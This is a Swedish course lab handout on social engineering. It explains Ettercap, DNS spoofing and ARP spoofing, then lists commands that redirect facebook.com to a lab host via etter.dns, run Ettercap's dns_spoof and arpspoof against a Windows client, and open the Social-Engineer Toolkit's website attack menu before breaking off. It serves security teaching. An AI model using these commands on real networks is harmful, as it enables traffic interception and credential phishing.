Labb 2: Social Engineering

Vad menas egentligen med Social Engineering? Här nedan en kort video från social-engineering.com

Social Engineering (SE) är en blandning av vetenskap, psykologi och konst. Även om det är fantastiskt och komplicerat, det är också väldigt enkelt.

En definition från social-engineering.com säger att social manipulation är att påverka en person att ta beslut som kanske inte är i personens bäst. Som lärare känner jag mig träffad eftersom jag brukar säga att jag vill påverka positivt mina studenters framtid. Så den är inte alltid negativ. Dock det centrala för oss är den negativa manipulation som oftast leder till större skada för vilken organisations nätverk som helst.

Vi kommer att laborera med mjukvara som är kända som hacking-tools.

  • MITM-attack via Ettercap är ett kostnadsfritt och öppen källkodssäkerhetsverktyg som kan användas för DNS spoofing. Ettercap kan fånga nätverkstrafik, lösenord och utföra aktiv avlyssning mot ett antal vanliga protokoll. Det körs på olika operativsystem såsom Unix-liknande operativsystem inklusive Linux, Mac OS X, BSD och Solaris samt på Microsoft Windows.
  • DNS spoofing attack – en är en typ av attack som utnyttjar sårbarheter i DNS (domain name system) för att vidarekoppla Internet-trafik bort från legitima servrar och mot falska sådana.
  • ARP spoofing – ARP används för att koppla samman en IP-adress med en Mac-adress. Det hjälper kommunikationen mellan datorer i ett LAN. Det är just hur ARP arbetar som det kan användas i skadliga syften. Till exempel att översvämma datorn med falska MAC-adressbegäran för att få behörighet till andra enheter.

I laborationen kommer vi att dirigera om nätverkstrafiken till kalixtos.

Redigera filen "etter.dns" och lägg till DNS record "A" till posten för facebook.com

  1. Starta en terminal och exekvera:
  2. ls /etc/ettercap
  3. gedit /etc/ettercap/etter.dns
  4. Lägga till en ny post: *.facebook.com    A    192.168.2.10

Slutligen ska du exekvera: ethercap  -i  eth0  -T  -P  dns_spoof   

  • -i --> interface
  • -T --> text läge
  • -P --> plugin (spoof namn)   

I terminalen exekvera: arpspoof  -i  eth0  -t 192.168.2.12 192.168.2.254

Nu ska fångas MAC adressen för Windows klient med IP 192.168.2.12.

  • i - kalixtos interface
  • t - target 

På Windows klient exekvera nslookup www.facebook.com

Nu startar vi SET (Social engineering Tools) genom att klicka på [Applications], SET

SET startas och ger oss några alternativa verktyg att välja:

  1. Välj Social-Engineering Tools

Välj Website Attack Vectors

Välj alternativ 3

Välj alternativ 2